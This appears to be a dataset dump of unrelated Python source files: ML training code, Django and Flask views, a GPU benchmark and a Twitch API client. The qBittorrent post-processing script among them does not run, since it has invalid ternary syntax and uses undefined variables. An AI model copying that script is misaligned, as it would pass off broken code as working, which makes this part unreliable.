@pytest.mark.django_db
def test_image_with_rendition(client):
assert_query(client, 'image', '1', 'rendition')
@pytest.mark.django_db
def test_images_list(client):
assert_query(client, 'images', 'all')
|
11522024
|
import pytorch_lightning as pl
import torch
import torch.nn as nn
from quickvision.models.components import create_torchvision_backbone
from quickvision.models.detection.faster_rcnn import create_fastercnn_backbone
from quickvision.models.detection.utils import _evaluate_iou, _evaluate_giou
from torchvision.models.detection.faster_rcnn import (fasterrcnn_resnet50_fpn, FasterRCNN, FastRCNNPredictor,)
__all__ = ["LitFRCNN"]
class LitFRCNN(pl.LightningModule):
"""
Creates a Faster CNN which can be fine-tuned.
"""
def __init__(self, learning_rate: float = 0.0001, num_classes: int = 91,
backbone: str = None, fpn: bool = True,
pretrained_backbone: str = None, trainable_backbone_layers: int = 3, **kwargs,):
"""
Args:
learning_rate: the learning rate
num_classes: number of detection classes (including background)
pretrained: if true, returns a model pre-trained on COCO train2017
pretrained_backbone (str): if "imagenet", returns a model with backbone pre-trained on Imagenet
trainable_backbone_layers: number of trainable resnet layers starting from final block
"""
super().__init__()
self.learning_rate = learning_rate
self.num_classes = num_classes
self.backbone = backbone
if backbone is None:
self.model = fasterrcnn_resnet50_fpn(pretrained=True,
trainable_backbone_layers=trainable_backbone_layers,)
in_features = self.model.roi_heads.box_predictor.cls_score.in_features
self.model.roi_heads.box_predictor = FastRCNNPredictor(in_features, self.num_classes)
else:
backbone_model = create_fastercnn_backbone(self.backbone, fpn, pretrained_backbone,
trainable_backbone_layers, **kwargs,)
self.model = FasterRCNN(backbone_model, num_classes=num_classes, **kwargs)
def forward(self, x):
self.model.eval()
return self.model(x)
def training_step(self, batch, batch_idx):
images, targets = batch
targets = [{k: v for k, v in t.items()} for t in targets]
# fasterrcnn takes both images and targets for training, returns
loss_dict = self.model(images, targets)
loss = sum(loss for loss in loss_dict.values())
return {"loss": loss, "log": loss_dict}
def validation_step(self, batch, batch_idx):
images, targets = batch
# fasterrcnn takes only images for eval() mode
outs = self.model(images)
iou = torch.stack([_evaluate_iou(t, o) for t, o in zip(targets, outs)]).mean()
giou = torch.stack([_evaluate_giou(t, o) for t, o in zip(targets, outs)]).mean()
return {"val_iou": iou, "val_giou": giou}
def validation_epoch_end(self, outs):
avg_iou = torch.stack([o["val_iou"] for o in outs]).mean()
avg_giou = torch.stack([o["val_giou"] for o in outs]).mean()
logs = {"val_iou": avg_iou, "val_giou": avg_giou}
return {"avg_val_iou": avg_iou, "avg_val_giou": avg_giou, "log": logs}
def configure_optimizers(self):
return torch.optim.SGD(self.model.parameters(), lr=self.learning_rate,
momentum=0.9, weight_decay=0.005,)
|
11522026
|
import torch
import os
import sklearn.model_selection
def pad(channel, maxlen):
channel = torch.tensor(channel)
out = torch.full((maxlen,), channel[-1])
out[: channel.size(0)] = channel
return out
def subsample(X, y, subsample_rate):
if subsample_rate != 1:
X = X[:, :, ::subsample_rate]
return X, y
def save_data(dir, **tensors):
for tensor_name, tensor_value in tensors.items():
torch.save(tensor_value, str(dir / tensor_name) + ".pt")
def load_data(dir):
tensors = {}
for filename in os.listdir(dir):
if filename.endswith(".pt"):
tensor_name = filename.split(".")[0]
tensor_value = torch.load(str(dir / filename))
tensors[tensor_name] = tensor_value
return tensors
def normalise_data(X, y):
train_X, _, _ = split_data(X, y)
out = []
for Xi, train_Xi in zip(X.unbind(dim=-1), train_X.unbind(dim=-1)):
train_Xi_nonan = train_Xi.masked_select(~torch.isnan(train_Xi))
mean = train_Xi_nonan.mean() # compute statistics using only training data.
std = train_Xi_nonan.std()
out.append((Xi - mean) / (std + 1e-5))
out = torch.stack(out, dim=-1)
return out
def split_data(tensor, stratify):
# 0.7/0.15/0.15 train/val/test split
(
train_tensor,
testval_tensor,
train_stratify,
testval_stratify,
) = sklearn.model_selection.train_test_split(
tensor,
stratify,
train_size=0.7,
random_state=0,
shuffle=True,
stratify=stratify,
)
val_tensor, test_tensor = sklearn.model_selection.train_test_split(
testval_tensor,
train_size=0.5,
random_state=1,
shuffle=True,
stratify=testval_stratify,
)
return train_tensor, val_tensor, test_tensor
|
11522078
|
import pycuda.autoinit
from pycuda import gpuarray
import numpy as np
from skcuda import cublas
from time import time
m = 5000
n = 10000
k = 10000
def compute_gflops(precision='S'):
if precision=='S':
float_type = 'float32'
elif precision=='D':
float_type = 'float64'
else:
return -1
A = np.random.randn(m, k).astype(float_type)
B = np.random.randn(k, n).astype(float_type)
C = np.random.randn(m, n).astype(float_type)
A_cm = A.T.copy()
B_cm = B.T.copy()
C_cm = C.T.copy()
A_gpu = gpuarray.to_gpu(A_cm)
B_gpu = gpuarray.to_gpu(B_cm)
C_gpu = gpuarray.to_gpu(C_cm)
alpha = np.random.randn()
beta = np.random.randn()
transa = cublas._CUBLAS_OP['N']
transb = cublas._CUBLAS_OP['N']
lda = m
ldb = k
ldc = m
t = time()
handle = cublas.cublasCreate()
exec('cublas.cublas%sgemm(handle, transa, transb, m, n, k, alpha, A_gpu.gpudata, lda, \
B_gpu.gpudata, ldb, beta, C_gpu.gpudata, ldc)' % precision)
cublas.cublasDestroy(handle)
t = time() - t
gflops = 2*m*n*(k+1)*(10**-9) / t
return gflops
if __name__ == '__main__':
print('Single-precision performance: %s GFLOPS' % compute_gflops('S'))
print('Double-precision performance: %s GFLOPS' % compute_gflops('D'))
|
11522099
|
import objc as _objc
__bundle__ = _objc.initFrameworkWrapper(
"OpenDirectory",
frameworkIdentifier="com.apple.OpenDirectory",
frameworkPath=_objc.pathForFramework(
"/System/Library/Frameworks/OpenDirectory.framework"
),
globals=globals()
)
|
11522133
|
import os
import sys
import json
import logging
import numpy as np
logging.basicConfig(level=logging.INFO)
from robo.solver.hyperband_datasets_size_original_incumbent import HyperBand_DataSubsetsOriginalIncumbent
from hpolib.benchmarks.ml.svm_benchmark import SvmOnMnist, SvmOnVehicle, SvmOnCovertype, SvmOnAdult, SvmOnHiggs, SvmOnLetter
from hpolib.benchmarks.ml.residual_networks import ResidualNeuralNetworkOnCIFAR10
from hpolib.benchmarks.ml.conv_net import ConvolutionalNeuralNetworkOnCIFAR10, ConvolutionalNeuralNetworkOnSVHN
run_id = int(sys.argv[1])
dataset = sys.argv[2]
seed = int(sys.argv[3])
rng = np.random.RandomState(seed)
if dataset == "mnist":
f = SvmOnMnist(rng=rng)
output_path = "./experiments/fabolas/results/svm_%s/hyperband_%d" % (dataset, run_id)
elif dataset == "vehicle":
f = SvmOnVehicle(rng=rng)
output_path = "./experiments/fabolas/results/svm_%s/hyperband_%d" % (dataset, run_id)
elif dataset == "covertype":
f = SvmOnCovertype(rng=rng)
output_path = "./experiments/fabolas/results/svm_%s/hyperband_%d" % (dataset, run_id)
elif dataset == "higgs":
f = SvmOnHiggs(rng=rng)
output_path = "./experiments/fabolas/results/svm_%s/hyperband_%d" % (dataset, run_id)
elif dataset == "adult":
f = SvmOnAdult(rng=rng)
output_path = "./experiments/fabolas/results/svm_%s/hyperband_%d" % (dataset, run_id)
elif dataset == "letter":
f = SvmOnLetter(rng=rng)
output_path = "./experiments/fabolas/results/svm_%s/hyperband_%d" % (dataset, run_id)
elif dataset == "cifar10":
f = ConvolutionalNeuralNetworkOnCIFAR10(rng=rng)
output_path = "./experiments/fabolas/results/cnn_%s/hyperband_%d" % (dataset, run_id)
elif dataset == "svhn":
f = ConvolutionalNeuralNetworkOnSVHN(rng=rng)
output_path = "./experiments/fabolas/results/cnn_%s/hyperband_%d" % (dataset, run_id)
elif dataset == "res_net":
f = ResidualNeuralNetworkOnCIFAR10(rng=rng)
output_path = "./experiments/fabolas/results/%s/hyperband_%d" % (dataset, run_id)
os.makedirs(output_path, exist_ok=True)
eta = 3.
B = -int(np.log(f.s_min)/np.log(3))
print(B)
opt = HyperBand_DataSubsetsOriginalIncumbent(f, eta, eta**(-(B-1)), output_path=output_path, rng=rng)
opt.run(int(20 / B * 1.5))
test_error = []
for c in opt.incumbents:
test_error.append(f.objective_function_test(c)["function_value"])
results = dict()
results["test_error"] = test_error
results["runtime"] = opt.runtime
results["time_func_eval"] = opt.time_func_eval_incumbent
results["run_id"] = run_id
with open(os.path.join(output_path, 'results_%d.json' % run_id), 'w') as fh:
json.dump(results, fh)
|
11522148
|
import argparse
import asyncio
import datetime
import logging
import os
import shutil
import subprocess
"""
async def fb(cmd):
import select
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
poller = select.poll()
poller.register(proc.stdout, select.POLLIN)
poller.register(proc.stderr, select.POLLIN)
while True:
for result in poller.poll(1):
if result[0] == proc.stdout.name:
print(proc.stdout.readline())
if result[1] == proc.stderr.name:
print(proc.stderr.readline())
"""
"""
import asyncio
async def runc(args):
proc = await asyncio.create_subprocess_exec(*args)
while proc.returncode is None:
out = await proc.stdout.readline()
err = await proc.stderr.readline()
l1 = out.decode().rstrip()
l2 = err.decode().rstrip()
# Handle line (somehow)
print(out)
print(err)
print(l1)
print(l2)
args = (['ping','-c','10','google.com'])
asyncio.run(runc(args))
"""
# https://stackoverflow.com/questions/51133407/capture-stdout-and-stderr-of-process-that-runs-an-infinite-loop
async def fb(cmd):
# shell vs exec
proc = await asyncio.create_subprocess_exec(
*cmd,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE)
# read asyncronously proc.stdout
async for line in proc.stdout:
log.info(f'[stdout] {line.decode().rstrip()}')
# read asyncronously proc.stderr
async for line in proc.stderr:
log.info(f'[stderr] {line.decode().rstrip()}')
# Wait for the subprocess exit.
return await proc.wait()
def main():
scripts = os.getenv("SCRIPTS", default="/scripts")
ppr_log = os.getenv("PPR_LOG", default="/config/postprocess.log")
out_dir = os.getenv("OUT_DIR", default=os.getcwd())
media_out = os.path.join(out_dir, "Media")
fb_exec = shutil.which("filebot") or os.getenv("FILEBOT", default="/usr/bin/filebot")
log = logging.getLogger('qbittorrent.postprocess')
log.addHandler(logging.FileHandler(f"{ppr_log}.log"))
log.basicConfig(
format="{asctime:15} [{name}] - {levelname} - {message}",
datefmt="%Y-%m-%d %H:%M:%S",
style='{')
parser = argparse.ArgumentParser()
parser.add_argument("-G", "--qb-tags", help="torrent tags separated by comma")
parser.add_argument("-Z", "--qb-size", type=int, help="torrent size in bytes")
parser.add_argument("-T", "--qb-tracker", help="current tracker")
req = parser.add_argument_group('required arguments')
req.add_argument("-N", "--qb-name", help="torrent name", required=True)
req.add_argument("-L", "--qb-category", help="torrent category", required=True)
req.add_argument("-F", "--qb-content", help="content path, same as root for multifile torrent", required=True)
req.add_argument("-R", "--qb-root", help="root path, first torrent subdirectory path", required=True)
req.add_argument("-D", "--qb-save", help="torrent tags separated by comma", required=True)
req.add_argument("-C", "--qb-num", type=int, help="number of files", required=True)
req.add_argument("-I", "--qb-hash", help="torrent info hash", required=True)
args = parser.parse_args()
log.info('-' * 50)
log.info('--- RUN {} ---'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
log.info('Value of SCRIPTS:\t\t{}'.format(scripts))
log.info('Value of OUT_DIR:\t\t{}'.format(out_dir))
log.info('Value of FILEBOT:\t\t{}'.format(fb_exec))
log.info('Value of --qb-name:\t\t{}'.format(args.qb_name))
log.info('Value of --qb-category\t\t{}'.format(args.qb_category))
log.info('Value of --qb-tags\t\t{}'.format(args.qb_tags))
log.info('Value of --qb-root\t\t{}'.format(args.qb_root))
log.info('Value of --qb-save\t\t{}'.format(args.qb_save))
log.info('Value of --qb-num\t\t{}'.format(args.qb_num))
log.info('Value of --qb-size\t\t{}'.format(args.qb_size))
log.info('Value of --qb-hash\t\t{}'.format(args.qb_hash))
cmd = [filebot, '-script', 'fn:amc', '--action', 'keeplink',
'--output', media_out, '--conflict', 'skip', '-non-strict',
'--filter' "'!readLines(\"{}\").contains(n)'".format(os.path.join(scripts, 'excludes.txt')),
'--log-file', 'amc.log', '--def', 'excludelist=".excludes"',
'ut_dir={}'.format(args.qb_root), 'ut_kind={}'.format(qb_multi),
'ut_title={}'.format(args.qb_name), 'ut_label={}'.format(qb_category),
'@{}'.format(os.path.join(scripts, 'notify.txt')),
'@{}'.format(os.path.join(scripts, 'movieFormat.groovy')),
'@{}'.format(os.path.join(scripts, 'seriesFormat.groovy')),
'@{}'.format(os.path.join(scripts, 'animeFormat.groovy'))]
qb_multi = args.qb_num > 1 : 'multi' ? 'single'
ret = asyncio.run(fb(cmd))
log.info(f'{cmd!r} exited with {ret}')
if __name__ == '__main__':
main()
|
11522171
|
from typing import Generator, List
import twitch.tmi as tmi
from twitch.api import API
from twitch.baseresource import BaseResource
class Chatters(BaseResource['tmi.Chatter']):
def __init__(self, api: API, user: str):
super().__init__(api=api, path='group/user/{user}/chatters')
self._api = api
# API return data
self._data = self._api.get(self._path.format(user=user))
# API Data
self.count: int = self._data.get('chatter_count', -1)
self.types: List[str] = list(self._data.get('chatters', {}).keys())
self.broadcaster: List[tmi.Chatter] = [tmi.Chatter(self._api, name, 'broadcaster') for name in
self._data.get('chatters', {}).get('broadcaster', [])]
self.vips: List[tmi.Chatter] = [tmi.Chatter(self._api, name, 'vip') for name in
self._data.get('chatters', {}).get('vips', [])]
self.moderators: List[tmi.Chatter] = [tmi.Chatter(self._api, name, 'moderator') for name in
self._data.get('chatters', {}).get('moderators', [])]
self.staff: List[tmi.Chatter] = [tmi.Chatter(self._api, name, 'staff') for name in
self._data.get('chatters', {}).get('staff', [])]
self.admins: List[tmi.Chatter] = [tmi.Chatter(self._api, name, 'admin') for name in
self._data.get('chatters', {}).get('admins', [])]
self.global_mods: List[tmi.Chatter] = [tmi.Chatter(self._api, name, 'global_mod') for name in
self._data.get('chatters', {}).get('global_mods', [])]
self.viewers: List[tmi.Chatter] = [tmi.Chatter(self._api, name, 'viewer') for name in
self._data.get('chatters', {}).get('viewers', [])]
def all(self) -> List[tmi.Chatter]:
"""
Get all chatters from all groups
:return: List of all chatters
"""
return self.broadcaster + self.vips + self.moderators + self.staff + self.admins + self.global_mods + self.viewers
def __iter__(self) -> Generator['tmi.Chatter', None, None]:
"""
Iterate over all chatters
:return: Yield chatter
"""
for chatter in self.all():
yield chatter
def __getitem__(self, index: int) -> 'tmi.Chatter':
"""
Get chatter by index
:param index: Index
:return: Chatter
"""
return self.all()[index]
|
11522198
|
import numpy as np
import pickle
# Custom scaler to easily normalize features along the time axis.
class InputScaler():
def __init__(self):
self.X_means = list()
self.X_stds = list()
self.T_mean = 0
self.T_std = 0
def fit(self, X, T):
for f in range(X.shape[2]):
self.X_means.append(np.mean(X[:, :, f]))
self.X_stds.append(np.std(X[:, :, f]))
self.T_mean = np.mean(T)
self.T_std = np.std(T)
def transform(self, X, T):
for f in range(X.shape[2]):
X[:, :, f] = (X[:, :, f] - self.X_means[f]) / \
np.clip(self.X_stds[f], 1e-6, None)
T = (T - self.T_mean) / np.clip(self.T_std, 1e-6, None)
return X, T
def dump(self, path):
pickle.dump(self, open(path, 'wb'))
@staticmethod
def load(path):
return pickle.load(open(path, 'rb'))
|
11522203
|
from bread.bread import LabelValueReadView, EditView
from django import forms
from django.contrib import messages
from django.utils.translation import ungettext, ugettext_lazy as _
from django_filters import FilterSet
from audit.models import Discrepancy, VumiLog, SMSTrail
from libya_elections.libya_bread import PaginatedBrowseView, SoftDeleteBread, StaffBreadMixin
from libya_elections.utils import get_verbose_name
class DiscrepancyFilterSet(FilterSet):
class Meta:
model = Discrepancy
fields = ['resolved', ]
class DiscrepanciesBrowse(PaginatedBrowseView):
columns = [
(get_verbose_name(Discrepancy, 'creation_date'), 'formatted_creation_date',
'creation_date'),
(_("Direction"), 'get_direction_display'),
(_("From"), 'get_from'),
(_("To"), 'get_to'),
(get_verbose_name(Discrepancy, 'resolved'), 'resolved'),
]
filterset = DiscrepancyFilterSet
search_fields = [
'trail__sms__from_number', 'trail__sms__to_number', 'trail__sms__message',
'trail__vumi__from_addr', 'trail__vumi__to_addr', 'trail__vumi__content',
]
search_terms = _("source number, destination number, or message")
def get(self, request, *args, **kwargs):
# Default to "resolved=False"
if 'resolved' not in request.GET:
request.GET = request.GET.copy() # make editable
request.GET['resolved'] = '3' # choices are 1=any, 2=True, 3=False
response = super(DiscrepanciesBrowse, self).get(request, *args, **kwargs)
audited = SMSTrail.objects.count()
audited_messages = ungettext(
'%(count)d message was audited.',
'%(count)d messages were audited.',
audited
) % {'count': audited}
messages.info(request, audited_messages)
discrepancies = Discrepancy.objects.filter(resolved=False).count()
if discrepancies:
discrepancies_found = ungettext(
'There was %(count)d discrepancy found.',
'There were %(count)d discrepancies found.',
discrepancies
) % {'count': discrepancies}
messages.error(request, discrepancies_found)
return response
def get_queryset(self):
qset = super(DiscrepanciesBrowse, self).get_queryset()
return qset.select_related('trail', 'trail__sms', 'trail__vumi')
def get_direction(ctx):
return dict(VumiLog.DIRECTION_CHOICES)[ctx['object'].trail.direction]
def get_datetime(ctx):
return ctx['object'].trail.datetime
class DiscrepanciesRead(LabelValueReadView):
fields = [
(_("Direction"), get_direction),
(_("Message in registration system"), 'sms_as_html'),
(_("Message to/from the mobile network operator"), 'vumilog_as_html'),
(None, 'comments'),
(None, 'resolved'),
(get_verbose_name(Discrepancy, 'creation_date'),
'formatted_creation_date'),
(get_verbose_name(Discrepancy, 'modification_date'),
'formatted_modification_date'),
]
class DiscrepancyForm(forms.ModelForm):
class Meta:
model = Discrepancy
fields = ['comments', 'resolved']
class DiscrepanciesEdit(EditView):
form_class = DiscrepancyForm
class DiscrepanciesBread(StaffBreadMixin, SoftDeleteBread):
browse_view = DiscrepanciesBrowse
edit_view = DiscrepanciesEdit
model = Discrepancy
read_view = DiscrepanciesRead
plural_name = "discrepancies"
views = 'BRE'
class VumiLogRead(LabelValueReadView):
fields = [
(get_verbose_name(VumiLog, 'from_addr'), 'from_number_formatted_tag'),
(get_verbose_name(VumiLog, 'direction'), 'get_direction_display'),
(get_verbose_name(VumiLog, 'to_addr'), 'to_number_formatted_tag'),
(None, 'content'),
(get_verbose_name(VumiLog, 'creation_date'), 'formatted_creation_date'),
(get_verbose_name(VumiLog, 'modification_date'), 'formatted_modification_date'),
]
def get_context_data(self, **kwargs):
"""Add a back_url so we can link back to the associated discrepancy"""
context = super(VumiLogRead, self).get_context_data(**kwargs)
context['back_url'] = self.get_object().smstrail.discrepancy.get_absolute_url()
return context
class VumiLogsBread(StaffBreadMixin, SoftDeleteBread):
model = VumiLog
read_view = VumiLogRead
views = 'R'
|
11522230
|
import json
from flask import Blueprint, request
from apps.extention.business.cidata import CiDataBusiness, CiJobBusiness
from apps.extention.extentions import parse_list_args2, parse_json_form, validation
from apps.public.models.public import Config
from library.api.render import json_detail_render, json_list_render2
cidata = Blueprint('cidata', __name__)
@cidata.route('/', methods=['GET'])
def ci_list():
"""
@api {get} /v1/cidata/ 获取jenkins的job
@apiName GetJenkinsJob
@apiGroup CI
@apiDescription 查询jenkins的job
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"accuracy": "0",
"case_count": 0,
"description": "自动化例会通知",
"id": 15,
"name": "automation_meeting",
"nextBuildNumber": 63,
"status": 0
}
],
"message": "ok"
}
"""
data = CiDataBusiness.query_all_json()
return json_detail_render(0, data)
@cidata.route('/job/<int:ci_id>', methods=['get'])
def job_list(ci_id):
"""
@api {get} /v1/cidata/job/:ci_id 获取某个job的数据
@apiName GetJenkinsJobData
@apiGroup CI
@apiDescription 获取某个job的数据
@apiParam {int} ci_id job id
@apiParam {int} page_size 当前页面的数量
@apiParam {int} page_index 当前页面的页数
@apiParam {string} start_time 开始日期
@apiParam {string} end_time 结束日期
@apiParam {string} start_name 触发者
@apiParamExample {json} Request-Example:
{
"ci_id": 1,
"page_size":10,
"page_index":1,
"start_time":"2019-04-27",
"end_time":"2019-07-26",
"start_name":""
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"ci_id": 16,
"id": 3547,
"job_accuracy": "0.7814",
"job_count": 883,
"number": 135,
"report": "http://host:port/report.html",
"run_date": "Tue, 23 Jul 2019 12:48:00 GMT",
"run_time": "3232.939",
"start_name": "timer",
"status": 0,
"url": "http://ci.tcloud.com/job/tcloud_activity_api/135/"
}
],
"message": "ok",
"page_index": 1,
"page_size": 10,
"total": 1
}
"""
page_size, page_index = parse_list_args2()
data = CiJobBusiness.query_json_by_id(ci_id, page_size, page_index)
count = CiJobBusiness.query_count(ci_id)
return json_list_render2(0, data, page_size, page_index, count)
@cidata.route('/description/<int:ci_id>', methods=['get'])
def description_list(ci_id):
"""
@api {get} /v1/description/:ci_id 获取job的描述
@apiName GetJenkinsJobDescription
@apiGroup CI
@apiDescription 获取job的描述
@apiParam {int} ci_id job id
@apiParamExample {json} Request-Example:
{
"ci_id": 1,
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"error_count": 1,
"error_message": "['oom:\\n', '// OOM: com.tcloud(dump time: 2019-07-03 12:13:56)]",
"error_type": "OOM",
"id": 5,
"monkey_id": 29
}
],
"message": "ok"
}
"""
data = CiDataBusiness.query_description_by_id(ci_id)
return json_detail_render(0, data)
# @cidata.route('/updatedata', methods=['get'])
# def update_data():
# #改为内部job每天触发一次即可
# CiJobBusiness.update_jenkins_data()
# return json_detail_render(0, [])
@cidata.route('/run', methods=['POST'])
@validation('POST:cidatarunandreport')
def run_project():
"""
@api {post} /v1/cidata/run 触发job
@apiName runJob
@apiGroup CI
@apiDescription 触发job
@apiParam {list} run_list 触发的list
@apiParam {int} project_id 项目id
@apiParamExample {json} Request-Example:
{
"run_list": [1],
"project_id":1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"id": 1,
"isexcuting": false,
"job": "test_email",
"name": "<NAME>"
}
],
"message": "ok"
}
"""
project_id, run_list = parse_json_form('cidatarunandreport')
code, data, message = CiJobBusiness.run(project_id, run_list)
return json_detail_render(code, data, message)
@cidata.route('/report', methods=['POST'])
@validation('POST:cidatarunandreport')
def gain_report():
"""
@api {post} /v1/cidata/report 获取报告
@apiName gainJobReport
@apiGroup CI
@apiDescription job的报告
@apiParam {list} run_list 触发的list
@apiParam {int} project_id 项目id
@apiParamExample {json} Request-Example:
{
"run_list": [1],
"project_id":1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"id": 1,
"isexcuting": false,
"job": "tcloud_regression_test",
"name": "Tcloud回归测试",
"url": "http://host:port/report.html"
}
],
"message": "ok"
}
"""
project_id, run_list = parse_json_form('cidatarunandreport')
code, data, message = CiJobBusiness.gain_report(project_id, run_list)
return json_detail_render(code, data, message)
@cidata.route('/config/info', methods=['POST'])
@validation('POST:configinfo')
def gain_config_info():
"""
@api {post} /v1/cidata/config/info ci配置数据的获取
@apiName GainCIConfigData
@apiGroup CI
@apiDescription ci配置数据的获取
@apiParam {int} project_id 项目id
@apiParamExample {json} Request-Example:
{
"project_id":1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"id": 1,
"job": "tcloud_regression_test",
"name": "Tcloud回归测试"
}
],
"message": "ok"
}
"""
data = []
project_id = parse_json_form('configinfo')[0]
jenkins_config = Config.query.add_columns(Config.content.label('content')).filter(
Config.module == 'jenkins',
Config.module_type == 1).first()
run_dict = json.loads(jenkins_config.content)
if str(project_id) in run_dict.keys():
data = run_dict[str(project_id)]
return json_detail_render(0, data)
@cidata.route('/rundict', methods=['GET'])
def get_run_dict():
project_id = request.args.get('projectid')
run_dict, run_name_dict = CiJobBusiness.gain_run_dict(project_id)
data = {'run_dict': run_dict, 'run_name_dict': run_name_dict}
return json_detail_render(0, data)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.